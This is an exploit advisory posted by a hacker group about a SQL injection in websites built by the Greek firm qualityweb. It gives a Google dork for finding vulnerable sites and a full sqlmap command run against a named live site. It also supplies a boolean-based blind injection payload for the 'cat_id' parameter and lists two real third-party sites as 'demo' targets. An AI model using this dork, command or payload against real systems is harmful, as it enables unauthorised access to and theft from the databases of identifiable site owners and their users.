#################################################################################
# Exploit Title: qualityweb Sql İnjection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : Κατασκευή ιστοσελίδων | qualityweb inurl:cat_id=
# Tested on : Kali Linux 2018.1
# Date : 11.03.2018
# Vendor Home: https://www.qualityweb.gr/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Sqlmap Or Manuel
[+] Sql GET Parameter "cat_id=" İs Vulnerable
[+] The Back-End DBMS is MySQL
Command:root@TrazeR:~# sqlmap --timeout=10 --threads=10 --time-sec=2 --random-agent --level=5 --risk=3 --ignore-proxy --no-cast -u "http://www.k-soldatos.gr/view_cat.php?cat_id=15" --tamper=space2comment --dbms=Mysql --batch --dbs -f
Parameter: cat_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: cat_id=-3838) OR 3290=3290-- FBTw
Demo Sql:
http://www.k-soldatos.gr/view_cat.php?cat_id=15
http://www.greekradios.gr/radios_cat.asp?cat_id=7
Greet'Zzz :TrazeR & Zer0day & Göcebe & Kutluhan & R4PTOR